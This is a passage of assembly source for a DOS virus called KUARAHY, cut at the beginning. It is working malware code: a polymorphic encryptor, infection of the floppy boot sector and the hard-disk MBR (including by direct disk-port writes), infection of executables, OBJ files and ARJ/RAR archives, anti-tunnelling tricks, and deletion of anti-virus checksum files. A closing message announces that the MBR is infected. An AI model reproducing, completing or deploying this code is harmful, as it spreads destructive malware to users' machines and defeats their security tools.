cl,2 ; SUB mov ax,02c81h stosw mov di,offset Rotar mov ax,0401h stosw jmp Oima ADDEAR: mov cl,3 ; ADD mov ax,00481h stosw mov di,offset Rotar mov ax,0429h stosw Oima: xor ch,ch ; Choose new pointer mov di,offset Pointer-1 push cx mov cx,255 call Get_RND pop cx cmp al,80 ja UsarSI ; BX mov al,0bbh stosb mov di,offset ClaveB+2 mov ax,04343h stosw mov di,offset ClaveB-1 mov si,offset TablaBX-1 add si,cx movsb jmp Oikoma UsarSI: cmp al,160 ja UsarDI ; SI mov al,0beh stosb mov di,offset ClaveB+2 mov ax,04646h stosw mov di,offset ClaveB-1 mov si,offset TablaSI-1 add si,cx movsb jmp Oikoma UsarDI: mov al,0bfh ; DI stosb mov di,offset ClaveB+2 mov ax,04747h stosw mov di,offset ClaveB-1 mov si,offset TablaDI-1 add si,cx movsb Oikoma: xor si,si ; Write the new 1§ decryptor over mov di,offset CopiaVirus ; the buffer mov cx,offset Encriptado rep movsb mov si,offset CopiaVirus add si,offset Encriptado mov ax,word ptr [ClaveB] mov cx,0d8h Rotar: xor word ptr [si],ax ; Encrypt first part (BS/MBR one) inc si inc si loop Rotar cmp byte ptr cs:[QueEs],'b' ; Flag checking jne Voltemos mov si,offset CopiaVirus add si,offset Pointer ; Fix the pointer for BS/MBR copy mov word ptr [si],offset Encriptado+07c00h Voltemos: ret Checar_Ext: mov si,offset Cabecera or word ptr [si],02020h ; Lowercase extension or word ptr [si+2],020h mov di,offset Targets ; And check if it matchs with one Otro: mov si,offset Cabecera ; of the 8 we can manage cmp di,offset Targets+24 ja Ninguno mov cx,3 rep cmpsb jnz Otro cmp di,offset Targets+3 je Exe cmp di, offset Targets+6 je Com cmp di,offset Targets+9 je Sys cmp di,offset Targets+12 je Obj cmp di,offset Targets+15 je Bat cmp di,offset Targets+18 je Ovl cmp di,offset Targets+21 je Arj cmp di,offset Targets+24 je Rar Ninguno:mov byte ptr [QueEs],'X' ; :( stc ret Exe: mov al,'E' ; EXE jmp EternoRetorno Com: mov al,'C' ; COM jmp EternoRetorno Sys: mov al,'S' ; SYS jmp EternoRetorno Obj: mov al,'O' ; OBJ jmp EternoRetorno Bat: mov al,'B' ; BAT jmp EternoRetorno Ovl: mov al,'E' ; OVL jmp EternoRetorno Arj: mov al,'A' ; ARJ jmp EternoRetorno Rar: mov al,'R' ; RAR EternoRetorno: mov byte ptr [QueEs],al mov ds,bx clc ret Lectura:mov ah,3fh ; Read OBJ field descriptor mov cx,3 mov dx,offset Buffer int 21h mov dx,word ptr ds:[Buffer+1] mov al,byte ptr ds:[Buffer] ret CRC32: push bx cx si di call Generar_Tabla ; Generate CRC 32 table mov dx,0ffffh mov ax,0ffffh CRC32loop: sub bx,bx mov bl,byte ptr [si] inc si xor bl,al shl bx,1 shl bx,1 mov al,ah mov ah,dl mov dl,dh xor dh,dh xor ax,word ptr [bx+offset ParaCRC] xor dx,word ptr [bx+offset ParaCRC+2] dec cx jnz CRC32loop xor dx,0ffffh xor ax,0ffffh pop di si cx bx ret Chequeo:mov ax,013cdh ; Yes, we are TSR mov bx,cs iret Generar_Tabla: ; Generates the CRC 32 table push ax cx dx di mov di,offset ParaCRC ; Buffer where the table will be xor cx,cx ; created Carrusell: xor dx,dx xor ax,ax mov al,cl push cx mov cx,8 Calculo:clc rcr dx,1 rcr ax,1 jnc NoXORear xor dx,0edb8h xor ax,8320h NoXORear: loop Calculo mov word ptr [di],ax mov word ptr [di+2],dx add di,4 pop cx inc cx cmp cx,100h jne Carrusell pop di dx cx ax ret Kill_Tunnel: push ds si ax bx pushf pop ax and ah,11111110b ; Turn off the trap flag push ax popf sub ax,ax mov ds,ax mov bx,4 lds si,[bx] mov byte ptr [si],0cfh ; Put an IRET in the INT 1 handler pop bx ax si ds ret Infectar: ; Floppy infection routine pushf call dword ptr cs:[Offset_de_la_13h] jc Error_de_Lectura cmp word ptr es:[bx+offset Marca],0f7e2h je Stealth_BS ; If already infected, stealth it cmp word ptr es:[bx+13h],0b40h jne Error_de_Lectura ; FD 1.44mb? 2880 sectors pushf push ax bx cx dx si di mov byte ptr cs:[DondeEstamos],'F' push es push ds push es pop ds push cs pop es lea si,[bx+3] ; Save BPB values of the floppy mov di,3 mov cx,3bh rep movsb pop ds pop es call Format_an_extra_track ; Create our new cylinder in A: mov ax,0301h ; Write original BS to sector 1 sub dx,dx ; Head 0 mov cx,05001h ; Track 80, sector 1 pushf call dword ptr cs:[Offset_de_la_13h] mov ax,0301h pushf call dword ptr cs:[Offset_de_la_13h] push es push cs pop es mov byte ptr cs:[QueEs],'b' ; Modify our flag push bp ds es mov bp,020fh call Encriptor ; Give me an encrypted copy pop es ds bp mov ax,0309h ; Write the virus in the contiguos mov cx,5002h ; sectors of our track 80 mov bx,offset CopiaVirus+200h pushf call dword ptr cs:[Offset_de_la_13h] mov ax,0309h pushf call dword ptr cs:[Offset_de_la_13h] mov ax,0301h mov cx,0001h ; Write virus first part to BS xor dx,dx mov bx,offset CopiaVirus pushf call dword ptr cs:[Offset_de_la_13h] pop es pop di si dx cx bx ax popf Error_de_Lectura: retf 2 db 3,'Rohaih£ Paraguay!',3 ; Guaran¡ language r0x0r!!! Format_an_extra_track: ; The extra track kreator push ds es bx push cs cs pop ds es xor ax,ax mov ds,ax ; DS=IVT mov si,01eh*4 mov di,offset Vieja1eh ; Copy old Int 1eh address (ddpt) movsw movsw mov es,ax mov di,01eh*4 mov ax,offset FDHD35 ; Hook Int 1eh, points to our own table stosw mov ax,cs stosw push cs cs pop ds es mov di,offset Tabla ; Generation of the little table mov cx,0201h Fabricar_Tabla: mov ax,0050h ; 50h=80d, our new track stosw ; 0 is for the head 0 mov ax,cx ; CH=02, 512 bytes x sector stosw inc cl ; INC sector counter cmp cx,020Ah jbe Fabricar_Tabla xor ax,ax int 13h mov ax,050Ah ; Format 10 sectors mov bx,offset Tabla mov cx,05001h ; Track 80, from sector #1 xor dx,dx ; Head 0, drive A: int 13h xor ax,ax mov es,ax mov si,offset Vieja1eh ; Restore Int 1eh mov di,1eh*4 movsw movsw pop bx es ds ret InfectarMBR: ; MBR infector procedure push ax bx cx dx si di bp ds es push cs cs pop ds es cmp byte ptr es:[Bandera],'N' jne Adios ; Already infected in previous ocasion mov ax,0201h mov bx,offset MBRBS ; Read MBR mov cx,1 mov dx,0080h int 13h cmp word ptr [bx+offset Marca],0f7e2h jne SuckIt ; Already infected? Adios: pop es ds bp di si dx cx bx ax iret SuckIt: mov byte ptr es:[DondeEstamos],'H' mov byte ptr es:[Bandera],'Y' mov di,32 ; Check my flag call Reutilizar jmp short Adios Direct_HD_Write_Using_Ports: ; MBR infection via HD ports mov dx,01f2h ; Initial port mov cx,6 ; We will go 6 times outsb ; Send the byte to port inc dx ; Next port loop $-2 ; Repeat Esperar:in al,dx test al,8 ; Wait... jz Esperar mov si,bx ; DS:SI=buffer to write mov cx,256 mov dx,1f0h repe outsw ; Do it ret TablaBX db 037h,02fh,07h ; TablaSI db 034h,02ch,04h ; Tables used to mutate decryptor TablaDI db 035h,02dh,05h ; ; Disk device parameter table for our new track FDHD35 db 0dfh,2,025h,2,012h,01bh,0ffh,06ch,2,0fh,8 ; Values that we will send to HD ports ParaOuting db 1,1,0,0,0a0h,30h ; Stupid files we will delete in order to free space :) Basura1 db 'ANTI-VIR.DAT',0 Basura2 db 'CHKLIST.MS',0 Basura3 db 'CHKLIST.CPS',0 Basura4 db 'AVP.CRC',0 ; This is the parameter table for 4Bh function PSP dw 0,80h SLINEA dw 0,005ch FCB1 dw 0,006ch FCB2 dw 0 RunMe db 'C:\COMMAND.COM',0 ; OBJ ending module Finalizacion: db 08ah,07h,00h,0c1h,010h,01h,01h,00h,01h,09bh ; The OBJ record where the virus will go VirusOBJRecord: db 0a0h dw Largor+3 db 01 dw 100h ; Insane bitmapped fonts. To change default text mode fonts to a nicer one Letras db 00000000b db 00000000b db 00111000b db 01111100b db 11000110b db 11000110b db 01101100b db 11111110b ; A db 11000110b db 11000110b db 11000110b db 01000100b db 00000000b db 00000000b db 00000000b db 00000000b db 11111000b db 01111100b db 01100110b db 01100110b db 01101110b db 11111100b ; B db 01100110b db 01100110b db 01111110b db 11111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00111000b db 01111100b db 11100110b db 01100110b db 01100010b db 01100000b ; C db 01100010b db 11100110b db 01111110b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 11110000b db 00111000b db 00011100b db 01001110b db 11100110b db 01100110b ; D db 01100110b db 01100110b db 01111100b db 11111000b db 00000000b db 00000000b db 00000000b db 00000000b db 01111000b db 11111100b db 01100110b db 01101010b db 11111000b db 01101000b ; E db 01100010b db 01100110b db 11111100b db 01111000b db 00000000b db 00000000b db 00000000b db 00000000b db 01111100b db 11111110b db 01100010b db 01100000b db 01101000b ; F db 11111000b db 01101000b db 01100000b db 01100000b db 11110000b db 00000000b db 00000000b db 00000000b db 00000000b db 01111100b db 11101110b db 01100110b db 01100100b db 01100000b ; G db 11100010b db 01100110b db 01101110b db 11111110b db 01110110b db 00000010b db 00000000b db 00000000b db 00000000b db 01000010b db 01100110b db 01100110b db 01100110b db 11100111b ; H db 01111110b db 01100110b db 01100110b db 01100110b db 01000010b db 00000000b db 00000000b db 00000000b db 00000000b db 00011000b db 00111100b db 00111100b db 00011000b db 00011000b ; I db 00011000b db 00011000b db 00111100b db 00111100b db 00011000b db 00000000b db 00000000b db 00000000b db 00000000b db 00000110b db 00001110b db 00001110b db 01000110b db 01100110b ; J db 01110110b db 01100110b db 01100110b db 01100110b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00100010b db 01100110b db 11100110b db 01100110b db 01110100b ; K db 01111000b db 01101100b db 11100110b db 01100110b db 00100010b db 00000000b db 00000000b db 00000000b db 00000000b db 00100000b db 01100000b db 11100000b db 01100000b db 01100000b ; L db 01100010b db 01100110b db 01101110b db 01100110b db 11111100b db 00000000b db 00000000b db 00000000b db 00000000b db 10000010b db 11000010b db 11000110b db 11101110b db 11111110b db 11010110b ; M db 11010110b db 11000110b db 11000110b db 01000100b db 00000000b db 00000000b db 00000000b db 00000000b db 10000010b db 11000110b db 11100110b db 11110110b db 11011110b ; N db 11001110b db 11000110b db 11000110b db 11000110b db 01000010b db 00000000b db 00000000b db 00000000b db 00000000b db 00011000b db 00111100b db 01101110b db 01100110b db 01100110b db 01100110b ; O db 01100110b db 01110110b db 00111100b db 00011000b db 00000000b db 00000000b db 00000000b db 00000000b db 11110000b db 01111100b db 01101110b db 01100110b db 01100110b db 01101110b ; P db 11111100b db 01100000b db 01100000b db 01000000b db 00000000b db 00000000b db 00000000b db 00000000b db 00110000b db 01111100b db 11000110b db 11000110b db 11000110b db 11000110b ; Q db 11000110b db 11010110b db 01111100b db 00011000b db 00001100b db 00000000b db 00000000b db 00000000b db 11111100b db 01100110b db 01100110b db 01100110b db 01110100b db 01111000b ; R db 01101100b db 11100110b db 01100110b db 00100010b db 00000000b db 00000000b db 00000000b db 00000000b db 00111100b db 01100110b db 01100110b db 01100110b db 00110010b ; S db 00011000b db 0001100b db 00100110b db 01100110b db 10111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00100100b db 01111110b db 11011011b db 10011001b db 00011000b db 00011000b ; T db 00011000b db 00011000b db 00011000b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 01000010b db 01100110b db 01100110b db 01100110b db 01100110b ; U db 01100110b db 01100110b db 01100110b db 01111110b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00100100b db 01100110b db 01100110b db 01100110b db 01100110b ; V db 01100110b db 01100110b db 01100110b db 00111100b db 00011000b db 00000000b db 00000000b db 00000000b db 00000000b db 10000010b db 11000110b db 11000110b db 11000110b db 11010110b db 11010110b ; W db 11111110b db 11111110b db 11101110b db 01000100b db 00000000b db 00000000b db 00000000b db 00000000b db 01000010b db 01100110b db 00111100b db 00011000b db 00011000b ; X db 00011000b db 00011000b db 00111100b db 01100110b db 01000010b db 00000000b db 00000000b db 00000000b db 00000000b db 01000010b db 01100110b db 01100110b db 00111100b db 00011000b db 00011000b ; Y db 00011000b db 00011000b db 00011000b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00111100b db 01100110b db 01000110b db 00001100b db 00011000b ; Z db 01111100b db 00110000b db 01100010b db 01100110b db 00111100b db 00000000b db 00000000b Buffer db 0,0,0 ; Used by the OBJ infection Entrada db 0,0,0 ; procedure Linea db ' /C ' ; This is our RAR header RARHeader: ; Hey Star0! RARHeaderCRC: dw 0 RARType: db 074h ; File Header RARFlags: dw 8000h RARHeadsize: dw HeaderSize RARCompressed: dd Largor ; Both are the same RAROriginal: dd Largor ; because we stored it RAROs: db 0 ; MS-DOS RARCrc32: dd 0 RARTimeDate db 0deh,045h,022h,025h ; Marked time+date RARNeedVer: db 014h RARMethod: db 030h ; Storing method of compression RARFnameSize: dw EndRARHeader-RARName RARAttrib: dd 0 RARName: db "FONT.COM" EndRARHeader: ; We will write this to the ARJ HeaderARJ: ARJSig: db 60h,0EAh ; ARJ signature ARJHeadsiz: dw 28h ; Header size ARJHSmsize: db 1Eh ; Internal header size ARJVer: db 07h ; Ver made by ARJMin: db 01h ; Minimum version to extract ARJHost: db 0h ; Host OS ARJFlags: db 10h ; Flags ARJMethod: db 0h ; Method=stored ARJFiletype: db 0h ; File type=binary ARJReserved: db 'Z' ; reserved TimeDate db 0deh,045h,022h,025h ; Marked time+date ARJCompress: dd Largor ; size compressed ARJOriginal: dd Largor ; size uncompressed ARJCrc32: dd 0 ; CRC of The file ARJEntryName: dw 0 ; Just God Knows... ARJAttribute: dw 0 ; Attribute ARJHostData: dw 0 ; Unknown Mnemonic... SecondSide: Agregar: db 'FONT.COM',0 ; FileName ARJComment: db 0 ; Comment ARJHeaderCrc: dd 0 ; Header Crc32 ARJExtended: dw 0 ; Extended Header EndSide: OMEGA: ; End of virus in the file Stratovarius dw 0 ; Best Melodic Metal Group!!! AtribsFile dw 0 Vieja24h dd 0 Victima dd 0 SFT dd 0 MBRBS db 512 dup(0) Cabecera db 45d dup(0) FileName db 128d dup(0) CopiaVirus db Largor dup(0) Vieja1eh dd 0 TABLA db 40 dup(0) ; The table will be generated here ParaCRC db 1024 dup(0) FAKEHOSTE: push cs ; Our sucked hoste :) pop ds mov ah,9 ; Print the message mov dx,offset Dreamspace int 21h mov ax,4c00h ; Turn back to DOS int 21h Dreamspace: ; Excelent Stratovarius's album! db 13,10,13,10,13,10,13,10 db " Now it's time for you to move on",13,10 db " Leave the shadows of your past",13,10 db " Don't let them haunt you forever",13,10,13,10 db " Hold on to your dream",13,10 db " Somewhere there's a beam of hope",13,10 db " which is guiding your way through the dark",13,10,13,10 db " Hold on to your dream - STRATOVARIUS",13,10,13,10 db " KUARAHY virus released! Your MBR is infected. Embogues‚ kuarahy?",13,10,13,10,'$' END KUARAHY ; Yes, this is the end...